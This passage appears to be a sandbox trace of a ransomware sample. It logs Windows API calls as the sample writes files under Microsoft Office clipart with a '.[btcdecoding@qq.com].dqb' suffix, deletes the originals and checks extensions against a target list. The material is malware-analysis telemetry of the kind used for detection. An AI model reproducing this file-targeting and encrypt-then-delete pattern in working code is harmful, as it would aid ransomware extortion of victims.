[0055.683] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.683] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.683] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.683] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00184_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0055.684] GetLastError () returned 0x0 [0055.684] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x1370, lpOverlapped=0x0) returned 1 [0055.686] WriteFile (in: hFile=0x178, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x1380, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x1380, lpOverlapped=0x0) returned 1 [0055.687] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0055.687] WriteFile (in: hFile=0x178, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.687] SetEndOfFile (hFile=0x178) returned 1 [0055.687] CloseHandle (hObject=0x178) returned 1 [0055.688] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.688] SetEndOfFile (hFile=0x17c) returned 1 [0055.688] CloseHandle (hObject=0x17c) returned 1 [0055.688] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.689] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00184_.wmf")) returned 1 [0055.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 63 [0055.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 63 [0055.689] lstrlenW (lpString=".doc") returned 4 [0055.689] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.689] lstrlenW (lpString=".docx") returned 5 [0055.689] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.689] lstrlenW (lpString=".pdf") returned 4 [0055.689] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.689] lstrlenW (lpString=".xls") returned 4 [0055.689] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.689] lstrlenW (lpString=".xlsx") returned 5 [0055.689] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.689] lstrlenW (lpString=".ppt") returned 4 [0055.689] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 63 [0055.689] lstrlenW (lpString=".zip") returned 4 [0055.689] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.689] lstrlenW (lpString=".rar") returned 4 [0055.689] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.689] lstrlenW (lpString=".bz2") returned 4 [0055.690] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.690] lstrlenW (lpString=".7z") returned 3 [0055.690] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 63 [0055.690] lstrlenW (lpString=".dbf") returned 4 [0055.690] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 63 [0055.690] lstrlenW (lpString=".1cd") returned 4 [0055.690] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 63 [0055.690] lstrlenW (lpString=".jpg") returned 4 [0055.690] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.691] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.691] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.691] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00186_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0055.691] GetLastError () returned 0x0 [0055.691] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x31f4, lpOverlapped=0x0) returned 1 [0055.693] WriteFile (in: hFile=0x178, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x3200, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x3200, lpOverlapped=0x0) returned 1 [0055.694] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0055.694] WriteFile (in: hFile=0x178, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.694] SetEndOfFile (hFile=0x178) returned 1 [0055.694] CloseHandle (hObject=0x178) returned 1 [0055.695] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.695] SetEndOfFile (hFile=0x17c) returned 1 [0055.695] CloseHandle (hObject=0x17c) returned 1 [0055.696] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.696] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00186_.wmf")) returned 1 [0055.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 63 [0055.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 63 [0055.696] lstrlenW (lpString=".doc") returned 4 [0055.696] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.696] lstrlenW (lpString=".docx") returned 5 [0055.696] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.696] lstrlenW (lpString=".pdf") returned 4 [0055.696] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.696] lstrlenW (lpString=".xls") returned 4 [0055.696] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.696] lstrlenW (lpString=".xlsx") returned 5 [0055.696] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.696] lstrlenW (lpString=".ppt") returned 4 [0055.696] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 63 [0055.696] lstrlenW (lpString=".zip") returned 4 [0055.697] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.697] lstrlenW (lpString=".rar") returned 4 [0055.697] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.697] lstrlenW (lpString=".bz2") returned 4 [0055.697] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.697] lstrlenW (lpString=".7z") returned 3 [0055.697] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.697] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 63 [0055.697] lstrlenW (lpString=".dbf") returned 4 [0055.697] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.697] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 63 [0055.697] lstrlenW (lpString=".1cd") returned 4 [0055.697] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.697] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 63 [0055.697] lstrlenW (lpString=".jpg") returned 4 [0055.697] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.697] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.697] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.697] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00200_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0055.698] GetLastError () returned 0x0 [0055.698] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0xc20, lpOverlapped=0x0) returned 1 [0055.699] WriteFile (in: hFile=0x178, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xc30, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xc30, lpOverlapped=0x0) returned 1 [0055.700] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0055.700] WriteFile (in: hFile=0x178, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.700] SetEndOfFile (hFile=0x178) returned 1 [0055.700] CloseHandle (hObject=0x178) returned 1 [0055.700] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.700] SetEndOfFile (hFile=0x17c) returned 1 [0055.701] CloseHandle (hObject=0x17c) returned 1 [0055.701] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.701] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00200_.wmf")) returned 1 [0055.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 63 [0055.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 63 [0055.702] lstrlenW (lpString=".doc") returned 4 [0055.702] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.702] lstrlenW (lpString=".docx") returned 5 [0055.702] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.702] lstrlenW (lpString=".pdf") returned 4 [0055.702] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.702] lstrlenW (lpString=".xls") returned 4 [0055.702] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.702] lstrlenW (lpString=".xlsx") returned 5 [0055.702] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.702] lstrlenW (lpString=".ppt") returned 4 [0055.702] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 63 [0055.702] lstrlenW (lpString=".zip") returned 4 [0055.702] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.702] lstrlenW (lpString=".rar") returned 4 [0055.702] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.702] lstrlenW (lpString=".bz2") returned 4 [0055.702] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.702] lstrlenW (lpString=".7z") returned 3 [0055.702] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 63 [0055.702] lstrlenW (lpString=".dbf") returned 4 [0055.702] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 63 [0055.702] lstrlenW (lpString=".1cd") returned 4 [0055.702] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 63 [0055.702] lstrlenW (lpString=".jpg") returned 4 [0055.703] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.703] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.703] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.703] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00224_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0055.703] GetLastError () returned 0x0 [0055.703] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x634, lpOverlapped=0x0) returned 1 [0055.705] WriteFile (in: hFile=0x178, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x640, lpOverlapped=0x0) returned 1 [0055.706] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0055.706] WriteFile (in: hFile=0x178, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.706] SetEndOfFile (hFile=0x178) returned 1 [0055.706] CloseHandle (hObject=0x178) returned 1 [0055.706] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.706] SetEndOfFile (hFile=0x17c) returned 1 [0055.707] CloseHandle (hObject=0x17c) returned 1 [0055.707] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.707] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00224_.wmf")) returned 1 [0055.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 63 [0055.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 63 [0055.707] lstrlenW (lpString=".doc") returned 4 [0055.707] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.707] lstrlenW (lpString=".docx") returned 5 [0055.707] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.708] lstrlenW (lpString=".pdf") returned 4 [0055.708] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.708] lstrlenW (lpString=".xls") returned 4 [0055.708] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.708] lstrlenW (lpString=".xlsx") returned 5 [0055.708] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.708] lstrlenW (lpString=".ppt") returned 4 [0055.708] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.708] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 63 [0055.708] lstrlenW (lpString=".zip") returned 4 [0055.708] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.708] lstrlenW (lpString=".rar") returned 4 [0055.708] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.708] lstrlenW (lpString=".bz2") returned 4 [0055.708] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.708] lstrlenW (lpString=".7z") returned 3 [0055.708] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.708] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 63 [0055.708] lstrlenW (lpString=".dbf") returned 4 [0055.708] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.708] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 63 [0055.708] lstrlenW (lpString=".1cd") returned 4 [0055.708] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.708] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 63 [0055.708] lstrlenW (lpString=".jpg") returned 4 [0055.708] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.709] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.709] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.709] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00438_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0055.709] GetLastError () returned 0x0 [0055.709] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x4bc, lpOverlapped=0x0) returned 1 [0055.720] WriteFile (in: hFile=0x178, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x4c0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x4c0, lpOverlapped=0x0) returned 1 [0055.721] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0055.721] WriteFile (in: hFile=0x178, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.721] SetEndOfFile (hFile=0x178) returned 1 [0056.144] CloseHandle (hObject=0x178) returned 1 [0056.145] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0056.145] SetEndOfFile (hFile=0x17c) returned 1 [0056.145] CloseHandle (hObject=0x17c) returned 1 [0056.146] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0056.146] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00438_.wmf")) returned 1 [0056.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 63 [0056.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 63 [0056.551] lstrlenW (lpString=".doc") returned 4 [0056.551] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.551] lstrlenW (lpString=".docx") returned 5 [0056.551] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.551] lstrlenW (lpString=".pdf") returned 4 [0056.551] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.551] lstrlenW (lpString=".xls") returned 4 [0056.551] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.551] lstrlenW (lpString=".xlsx") returned 5 [0056.551] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.551] lstrlenW (lpString=".ppt") returned 4 [0056.551] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 63 [0056.551] lstrlenW (lpString=".zip") returned 4 [0056.551] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.551] lstrlenW (lpString=".rar") returned 4 [0056.551] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.551] lstrlenW (lpString=".bz2") returned 4 [0056.551] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.551] lstrlenW (lpString=".7z") returned 3 [0056.551] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 63 [0056.551] lstrlenW (lpString=".dbf") returned 4 [0056.551] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 63 [0056.551] lstrlenW (lpString=".1cd") returned 4 [0056.551] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 63 [0056.551] lstrlenW (lpString=".jpg") returned 4 [0056.551] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.763] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0056.774] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0056.774] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00442_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0056.798] GetLastError () returned 0x0 [0056.799] ReadFile (in: hFile=0x174, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x9b8, lpOverlapped=0x0) returned 1 [0056.800] WriteFile (in: hFile=0x204, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x9c0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x9c0, lpOverlapped=0x0) returned 1 [0056.801] ReadFile (in: hFile=0x174, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0056.801] WriteFile (in: hFile=0x204, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.801] SetEndOfFile (hFile=0x204) returned 1 [0056.801] CloseHandle (hObject=0x204) returned 1 [0056.801] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0056.801] SetEndOfFile (hFile=0x174) returned 1 [0056.802] CloseHandle (hObject=0x174) returned 1 [0056.802] SetFileAttributesW (lpFileName="C:\\Program 